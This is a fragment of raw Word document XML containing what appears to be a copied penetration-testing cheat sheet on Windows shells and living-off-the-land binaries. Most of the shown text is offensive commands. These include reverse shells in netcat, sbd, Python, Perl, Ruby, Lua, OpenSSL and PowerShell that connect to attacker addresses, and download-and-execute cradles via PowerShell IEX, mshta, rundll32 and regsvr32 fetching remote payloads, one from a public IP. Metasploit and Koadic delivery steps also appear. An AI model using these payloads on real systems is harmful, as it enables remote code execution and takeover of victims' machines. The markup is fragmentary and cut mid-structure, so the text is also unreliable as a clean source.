            <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
          </w:rPr>
          <w:t>Shells - Windows</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1DDD7CC4" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A430272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Lolbas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="17C1885D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The page </w:t>
      </w:r>
      <w:hyperlink r:id="rId19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lolbas-project.github.io</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for Windows like </w:t>
      </w:r>
      <w:hyperlink r:id="rId20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https://gtfobins.github.io/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> is for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. Obviously,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there aren't SUID files or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sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 privileges in Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">, but it's useful to know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how</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> some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binaries</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be (ab)used to perform some kind of unexpected actions like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execute arbitrary code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76990D0E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NC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6896D7E8" w14:textId="46F3E204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DE5C90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nc.exe -e cmd.exe &lt;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Attacker_IP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 &lt;PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735D1084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SBD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F7A2F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21" w:history="1">
        <w:proofErr w:type="spellStart"/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>sbd</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/>
      </w:hyperlink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 is a portable and secure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Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 alternative</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">. It works on Unix-like systems and Win32. With features like strong encryption, program execution, customizable source </w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ports, and continuous reconnection, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sbd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides a versatile solution for TCP/IP communication. For Windows users, the sbd.exe version from the Kali Linux distribution can be used as a reliable replacement for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080F3C03" w14:textId="4D44005C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B7DF7E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Victims machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B8D2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sbd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-l -p 4444 -e bash -v -n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C836BF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listening on port 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D17ED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77FB695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3056F7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#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Atackers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02923D6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sbd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10.10.10.10 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4AD7C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id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3545276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uid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=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3905C0D6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Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC3957B" w14:textId="48065FBE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64A4AF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#Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2A401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C:\Python27\python.exe -c "(lambda __y, __g, __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contextlib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 [[[[[[[(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s.connect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(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __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ctx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 [__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ctx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.__enter__(), __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ctx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.__exit__(None, None, None), __out[0](lambda: None)][2])(__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contextlib.nested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(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __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exctype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, __value, __traceback: __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exctype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is not None and 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issubclass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(__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exctype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KeyboardInterrupt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 and [True for __out[0] in [((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s.close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(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __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exctype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, __value, __traceback: [False for __out[0] in [((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p.wait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(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(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threading.Thread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(target=p2s,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args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=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(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threading.Thread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(target=s2p,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args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=[s, p]))]][0] for __g['p'] in [(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subprocess.Popen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(['\\windows\\system32\\cmd.exe'],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stdout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subprocess.PIPE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, stderr=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subprocess.STDOUT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, stdin=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subprocess.PIPE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))]][0])[1] for __g['s'] in [(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socket.socket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socket.AF_INET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socket.SOCK_STREAM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))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].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stdout.read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(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].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stdin.write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(__l['data']), __after())[1] if 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len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(__l['data']) &gt; 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].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recv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(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['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'] in [(__import__('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', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))),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globals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(), __import__('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contextlib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'))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEA91B2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Perl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E4287C" w14:textId="3D66721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6F2208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perl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 'use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Socket;$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i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,"&gt;&amp;S");open(STDOUT,"&gt;&amp;S");open(STDERR,"&gt;&amp;S");exec("/bin/sh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");};'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D76C4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perl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-MIO -e '$c=new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IO::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Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1062D730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Ruby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE600AA" w14:textId="6E9D3F17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B4446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#Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B0608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ruby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rsocket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 'c=TCPSocket.new("[IPADDR]","[PORT]"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);while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(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print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io.read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}end'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33732D33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Lua</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6499CC6D" w14:textId="4FE4E49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B4455B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lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local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=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socket.tcp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() local io = require("io")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tcp:connect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(host, port); while true do local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, status, partial =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tcp:receive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() local f =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io.popen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, 'r') local s = f:read("*a") f:close()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tcp:send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(s) if status == "closed" then break end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end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tcp:close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()'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0798A7A5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OpenSSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066422E9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Attacker (Kali)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9C0070" w14:textId="148FAB03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DC9A09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req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-x509 -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newkey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rsa:4096 -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keyout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key.pem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-out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-days 365 -nodes #Generate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certificate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1B222A1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-key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key.pem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-cert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-port &lt;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l_port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&gt; #Here you will be able to introduce the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commands</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="08B512B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-key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key.pem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-cert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cert.pem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-port &lt;l_port2&gt; #Here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yo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will be able to get the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response</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="259BBAF8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Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62607051" w14:textId="2E0F780C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8C1C46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#Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C99136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-connect &lt;ATTACKER_IP&gt;:&lt;PORT1&gt;|/bin/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bash|openssl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-connect &lt;ATTACKER_IP&gt;:&lt;PORT2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A9B7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6B7B8C9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#Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCD143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openssl.exe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-connect &lt;ATTACKER_IP&gt;:&lt;PORT1&gt;|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cmd.exe|openssl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s_client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-quiet -connect &lt;ATTACKER_IP&gt;:&lt;PORT2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E0F0C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Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47E423B0" w14:textId="3763B7B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39F91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-exec bypass -c "(New-Object Net.WebClient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).Proxy.Credentials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=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4915E59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IEX(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New-Object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Net.WebClient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downloadString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('http://10.10.14.9:8000/ipw.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68166DF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Start-Process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NoNewWindow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IEX(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New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F862DF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echo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IEX(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New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') |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noprofile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="199F5420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Process performing network call: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powershell.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload written on disk: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NO</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">at least nowhere I could find using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t>procmon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:bdr w:val="single" w:sz="2" w:space="0" w:color="E5E7EB" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B03DA" w14:textId="44C18F6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47F8CD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-exec bypass -f \\webdavserver\folder\payload.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A513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Process performing network call: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svchost.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Payload written on disk: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WebDAV client local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cache</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2A19BD36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>One liner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387C967C" w14:textId="4190532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EA5F30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$client = New-Object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System.Net.Sockets.TCPClient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("10.10.10.10",80);$stream = $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client.GetStream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();[byte[]]$bytes = 0..65535|%{0};while(($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= $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stream.Read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($bytes, 0, $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bytes.Length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)) -ne 0){;$data = (New-Object -TypeName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System.Text.ASCIIEncoding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GetString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($bytes,0, $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);$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sendback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= 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iex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$data 2&gt;&amp;1 | Out-String );$sendback2  = $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sendback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+ "PS " + (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pwd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).Path + "&gt; ";$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sendbyte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= ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F694788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Get more info about different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Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 Shells at the end of this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document</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="64EA0D23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Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0206E4AA" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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22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From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5D7F0547" w14:textId="24DD23F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CFA657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mshta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vbscript:Close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(Execute("GetObject(""script:http://webserver/payload.sct"")"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D143E15" w14:textId="39C3DA51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C9E852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mshta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http://webserver/payload.hta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18679EC9" w14:textId="406B8125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A4348A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mshta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\\webdavserver\folder\payload.hta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624815DF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 xml:space="preserve">Example of </w:t>
      </w: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hta-psh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> reverse shell (use </w:t>
      </w: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hta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> to download and execute PS backdoor)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027C03FA" w14:textId="5C0DC57A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AB139E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 xml:space="preserve"> &lt;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language="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VBscRipT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"&gt;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CreateObject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WscrIpt.SheLL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").Run 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-ep bypass -w hidden IEX (New-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ObjEct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System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"&lt;/scRipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C063F17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You can download &amp; execute very easily a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Koadic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 zombie using the stager </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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hta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="06AF1160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hta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00827D6A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053A5650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23" w:history="1"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>From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2A0DE4A6" w14:textId="009DBE59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20986D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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72881FA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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B33599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&lt;HTA:APPLICATION ID="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HelloExample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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01669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&lt;script language="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jscript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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC9ECF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var c = "cmd.exe /c calc.exe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";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</w:p>
    <w:p w14:paraId="7993F94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new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ActiveXObject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('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WScript.Shell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).Run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(c);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCFBC5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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0879267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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC5099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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640E548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&lt;script&gt;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self.close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();&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CCA07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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0935F47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&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F13CC5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mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> - </w:t>
      </w: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sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="42B537D8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24" w:history="1"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>From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D2C310F" w14:textId="01FAE231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362F34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&lt;?XML version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661AC02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rundll32.exe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:"\..\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mshtml,RunHTMLApplication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";o=GetObject("script:http://webserver/scriplet.sct");window.close();  --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4B8E1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mshta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vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C95BE2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mshta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vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ABA1F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scriptlet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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E70B65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&lt;public&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050F803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&lt;/public&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5C32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&lt;script language="JScript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0D53F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&lt;![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CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405BE50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var r = new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ActiveXObject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WScript.Shell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).Run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("calc.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206F234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]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A82DE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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F701F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scriptlet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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67124567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Mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> - Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FD6BDE" w14:textId="4CDD28BD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F1FE94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use exploit/windows/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misc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hta_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server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5644590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exploit(windows/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misc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hta_server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) &gt; set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srvhost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192.168.1.109</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17172E8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exploit(windows/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misc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hta_server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) &gt; set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lhost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192.168.1.109</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F61404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exploit(windows/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misc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hta_server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 &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EC6720" w14:textId="0E19E08E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83CDD1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Victim&gt; mshta.exe //192.168.1.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109:8080/5EEiDSd70ET0k.hta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#The file name is given in the output of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metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="21F98FA0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Detected by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defender</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E079FCF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Rundll32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058AD6FB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25" w:history="1">
        <w:proofErr w:type="spellStart"/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>Dll</w:t>
        </w:r>
        <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> hello world example</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3A65FFF9" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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26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From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7619D469" w14:textId="4E3D87C7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7F6C1F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rundll32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\\webdavserver\folder\payload.dll,entrypoint</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="307D253C" w14:textId="637060E2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C0A413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rundll32.exe javascript:"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\..\mshtml,RunHTMLApplication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";o=GetObject("script:http://webserver/payload.sct");window.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4074D3B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Detected by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defender</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5CE9F8AD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Rundll32 -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sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="16F5FAB6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27" w:history="1"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>From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="759FE73D" w14:textId="179965C1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277082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&lt;?XML version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8140F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rundll32.exe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:"\..\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mshtml,RunHTMLApplication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";o=GetObject("script:http://webserver/scriplet.sct");window.close();  --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A5704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mshta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vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD086F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scriptlet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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D7912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&lt;public&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE80E6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&lt;/public&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747CACA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&lt;script language="JScript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF76CF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&lt;![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CDATA[</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481BF68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var r = new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ActiveXObject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WScript.Shell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).Run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("calc.exe");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CC844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]]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FCB58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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CD969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scriptlet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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E174425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Rundll32 - Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9E341B" w14:textId="4CDCD47D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941C28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use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smb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smb_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delivery</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6AD0A34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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611422A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#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C82F886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Rundll32 -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Koadic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="278516EE" w14:textId="32240E7A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7CD71A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use stager/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/rundll32_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js</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5F8E725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set SRVHOST 192.168.1.107</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C5E09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set ENDPOINT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sales</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2046621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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472DE6C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#Koadic will tell you what you need to execute inside the victim, it will be something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FBDCC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rundll32.exe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javascript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:"\..\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mshtml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RunHTMLApplication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";x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=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47528342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Regsvr32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43824C33" w14:textId="77777777" w:rsidR="00827D6A" w:rsidRPr="00827D6A" w:rsidRDefault="00827D6A" w:rsidP="00827D6A">
      <w:pPr>
        <w:pStyle w:val="max-w-3x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28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From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="78B21678" w14:textId="01921FE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314E08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regsvr32 /u /n /s /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i:http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://webserver/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payload.sct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scrobj.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F72484" w14:textId="3B63613B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E40A4A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regsvr32 /u /n /s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:\\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webdavserver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\folder\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payload.sct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scrobj.dll</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8BC09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Detected by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defender</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="01526F4E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Regsvr32 -</w:t>
      </w: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sct</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5284A22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29" w:history="1"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>From here</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="454CBEEE" w14:textId="0A38D5B7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C4587D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&lt;?XML version="1.0"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0278A1E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regsvr32 /u /n /s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i:http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://webserver/regsvr32.sct scrobj.dll --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E855F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&lt;!--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regsvr32 /u /n /s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:\\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webdavserver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\folder\regsvr32.sct scrobj.dll --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3435C06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scriptlet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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D23866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&lt;registration </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E762A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progid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="PoC"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C1511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classid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="{10001111-0000-0000-0000-0000FEEDACDC}" &gt;</w:t>
      </w:r>
    </w:p>
